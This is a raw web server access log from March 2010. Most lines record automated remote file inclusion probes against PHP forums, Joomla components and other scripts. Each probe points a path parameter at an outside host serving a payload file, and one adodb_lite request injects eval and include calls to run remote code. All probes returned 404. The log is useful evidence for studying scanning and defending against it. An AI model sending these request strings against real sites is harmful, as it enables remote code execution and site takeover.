58.150.99.144 - - [08/Mar/2010:05:39:31 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.205 - - [08/Mar/2010:05:42:01 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
74.50.50.79 - - [08/Mar/2010:05:42:53 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" "redneckmba.com"
74.50.50.79 - - [08/Mar/2010:05:42:53 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" "redneckmba.com"
72.29.80.127 - - [08/Mar/2010:05:46:04 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "redneckmba.com"
72.29.80.127 - - [08/Mar/2010:05:46:05 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "redneckmba.com"
208.77.223.114 - - [08/Mar/2010:05:47:11 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "redneckmba.com"
208.77.223.114 - - [08/Mar/2010:05:47:11 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "redneckmba.com"
222.237.78.176 - - [08/Mar/2010:05:47:14 -0800] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.237.78.176 - - [08/Mar/2010:05:47:14 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.237.78.176 - - [08/Mar/2010:05:47:14 -0800] "GET /logs/access_091228.log//skins/advanced/advanced1.php?pluginpath[0]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
82.76.12.197 - - [08/Mar/2010:05:47:57 -0800] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://alice-t.dk/cache/indc.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "redneckmba.com"
82.76.12.197 - - [08/Mar/2010:05:48:05 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://alice-t.dk/cache/indc.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "redneckmba.com"
82.76.12.197 - - [08/Mar/2010:05:48:08 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://alice-t.dk/cache/indc.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "redneckmba.com"
118.168.12.152 - - [08/Mar/2010:05:48:12 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [08/Mar/2010:05:48:12 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.168.12.152 - - [08/Mar/2010:05:48:17 -0800] "GET /write_comment_update.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "redneckmba.com"
209.217.76.226 - - [08/Mar/2010:05:48:47 -0800] "GET /127.0.0.1/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
209.217.76.226 - - [08/Mar/2010:05:48:48 -0800] "GET /logs/127.0.0.1/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
209.217.76.226 - - [08/Mar/2010:05:48:48 -0800] "GET /logs/access.log%20%20/127.0.0.1/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
216.119.103.12 - - [08/Mar/2010:05:49:30 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
216.119.103.12 - - [08/Mar/2010:05:49:31 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
216.119.103.12 - - [08/Mar/2010:05:49:31 -0800] "GET /logs/access.log/bbs/delete_all.php?board_skin_path=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.170.49 - - [08/Mar/2010:05:49:38 -0800] "GET /logs/127.0.0.1/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.170.49 - - [08/Mar/2010:05:49:39 -0800] "GET /logs/access.log%20%20/127.0.0.1/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.170.49 - - [08/Mar/2010:05:49:39 -0800] "GET /127.0.0.1/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.213.96.39 - - [08/Mar/2010:05:49:42 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "redneckmba.com"
118.129.170.49 - - [08/Mar/2010:05:49:43 -0800] "GET /127.0.0.1/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.170.49 - - [08/Mar/2010:05:49:43 -0800] "GET /logs/127.0.0.1/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.170.49 - - [08/Mar/2010:05:49:43 -0800] "GET /logs/access.log%20%20/127.0.0.1/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
203.253.198.140 - - [08/Mar/2010:05:51:21 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "redneckmba.com"
203.253.198.140 - - [08/Mar/2010:05:51:21 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "redneckmba.com"
209.217.76.226 - - [08/Mar/2010:05:51:59 -0800] "GET /logs/access.log/127.0.0.1/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
209.217.76.226 - - [08/Mar/2010:05:51:59 -0800] "GET /logs/127.0.0.1/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
209.217.76.226 - - [08/Mar/2010:05:51:59 -0800] "GET /127.0.0.1/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
190.152.217.250 - - [08/Mar/2010:06:10:05 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
190.152.217.250 - - [08/Mar/2010:06:12:48 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.105 - - [08/Mar/2010:06:13:04 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.194 - - [08/Mar/2010:06:14:36 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
216.119.103.12 - - [08/Mar/2010:06:19:12 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
216.119.103.12 - - [08/Mar/2010:06:19:12 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
216.119.103.12 - - [08/Mar/2010:06:19:13 -0800] "GET /logs/access.log/bbs/delete_all.php?board_skin_path=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.166.154 - - [08/Mar/2010:06:21:45 -0800] "GET /bbs//////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.129.166.154 - - [08/Mar/2010:06:21:45 -0800] "GET /logs/access.log%20%20//bbs//////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.129.166.154 - - [08/Mar/2010:06:21:45 -0800] "GET /logs//bbs//////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.206 - - [08/Mar/2010:06:27:07 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:06:31:29 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:06:31:29 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:06:31:34 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:06:31:34 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:06:31:34 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:06:31:41 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:06:32:13 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:06:32:14 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:06:32:16 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:06:32:19 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:06:32:21 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:06:32:25 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
174.133.164.82 - - [08/Mar/2010:06:36:52 -0800] "GET /logs//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://plrniches.com/lib/fatal1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
174.133.164.82 - - [08/Mar/2010:06:36:52 -0800] "GET /bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://plrniches.com/lib/fatal1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
174.133.164.82 - - [08/Mar/2010:06:36:52 -0800] "GET /logs/access.log%20%20//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://plrniches.com/lib/fatal1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
174.133.164.82 - - [08/Mar/2010:06:36:53 -0800] "GET /logs//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://plrniches.com/lib/fatal1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
174.133.164.82 - - [08/Mar/2010:06:36:55 -0800] "GET /bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://plrniches.com/lib/fatal1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
174.133.164.82 - - [08/Mar/2010:06:36:55 -0800] "GET /logs/access.log%20%20//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://plrniches.com/lib/fatal1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
174.133.164.82 - - [08/Mar/2010:06:41:30 -0800] "GET /logs/access.log//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://plrniches.com/lib/fatal1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.166.154 - - [08/Mar/2010:06:41:39 -0800] "GET /bbs//////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.166.154 - - [08/Mar/2010:06:41:40 -0800] "GET /logs//bbs//////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.166.154 - - [08/Mar/2010:06:41:40 -0800] "GET /logs/access.log//bbs//////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
174.133.164.82 - - [08/Mar/2010:06:44:52 -0800] "GET /logs/access.log//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://plrniches.com/lib/fatal1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
174.133.164.82 - - [08/Mar/2010:06:46:57 -0800] "GET /bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://plrniches.com/lib/fatal1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.133.164.82 - - [08/Mar/2010:06:46:57 -0800] "GET /logs/access.log//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://plrniches.com/lib/fatal1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.133.164.82 - - [08/Mar/2010:06:46:57 -0800] "GET /logs//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://plrniches.com/lib/fatal1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
123.143.29.250 - - [08/Mar/2010:06:59:29 -0800] "GET /logs//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
123.143.29.250 - - [08/Mar/2010:06:59:29 -0800] "GET /adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
123.143.29.250 - - [08/Mar/2010:06:59:29 -0800] "GET /logs/access.log//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:07:02:50 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:07:02:50 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:07:02:56 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
121.101.214.54 - - [08/Mar/2010:07:03:11 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
121.101.214.54 - - [08/Mar/2010:07:03:11 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
121.101.214.54 - - [08/Mar/2010:07:03:17 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
211.47.237.17 - - [08/Mar/2010:07:03:45 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
211.47.237.17 - - [08/Mar/2010:07:03:45 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
211.47.237.17 - - [08/Mar/2010:07:03:45 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
211.47.237.17 - - [08/Mar/2010:07:03:53 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
211.47.237.17 - - [08/Mar/2010:07:03:53 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
211.47.237.17 - - [08/Mar/2010:07:03:53 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.105 - - [08/Mar/2010:07:06:17 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
222.103.87.96 - - [08/Mar/2010:07:07:24 -0800] "GET /bbs/poll_etc_update.php?g4[path]=http://www.dialog-kiado.hu/szerzokpdf/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.103.87.96 - - [08/Mar/2010:07:07:24 -0800] "GET /logs/bbs/poll_etc_update.php?g4[path]=http://www.dialog-kiado.hu/szerzokpdf/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.103.87.96 - - [08/Mar/2010:07:07:24 -0800] "GET /logs/access.log/bbs/poll_etc_update.php?g4[path]=http://www.dialog-kiado.hu/szerzokpdf/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
219.240.39.222 - - [08/Mar/2010:07:07:43 -0800] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
219.240.39.222 - - [08/Mar/2010:07:07:43 -0800] "GET /logs/access.log//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
219.240.39.222 - - [08/Mar/2010:07:07:43 -0800] "GET /components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
219.240.39.222 - - [08/Mar/2010:07:08:10 -0800] "GET /components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
219.240.39.222 - - [08/Mar/2010:07:08:10 -0800] "GET /logs/access.log%20%20//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
219.240.39.222 - - [08/Mar/2010:07:08:10 -0800] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.7.205.103 - - [08/Mar/2010:07:10:59 -0800] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.7.205.103 - - [08/Mar/2010:07:10:59 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.7.205.103 - - [08/Mar/2010:07:10:59 -0800] "GET /logs/access.log%20%20/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
121.88.4.74 - - [08/Mar/2010:07:11:11 -0800] "GET /logs/access.log/bbs/poll_etc_update.php?g4[path]=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
121.88.4.74 - - [08/Mar/2010:07:11:11 -0800] "GET /bbs/poll_etc_update.php?g4[path]=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
121.88.4.74 - - [08/Mar/2010:07:11:11 -0800] "GET /logs/bbs/poll_etc_update.php?g4[path]=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.163.171.207 - - [08/Mar/2010:07:12:46 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.7.205.103 - - [08/Mar/2010:07:14:06 -0800] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.7.205.103 - - [08/Mar/2010:07:14:06 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.7.205.103 - - [08/Mar/2010:07:14:06 -0800] "GET /logs/access.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
219.240.39.222 - - [08/Mar/2010:07:14:55 -0800] "GET /logs/access.log//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
219.240.39.222 - - [08/Mar/2010:07:14:55 -0800] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
219.240.39.222 - - [08/Mar/2010:07:14:55 -0800] "GET /components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.7.205.103 - - [08/Mar/2010:07:16:35 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.7.205.103 - - [08/Mar/2010:07:16:35 -0800] "GET /logs/access.log%20%20/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
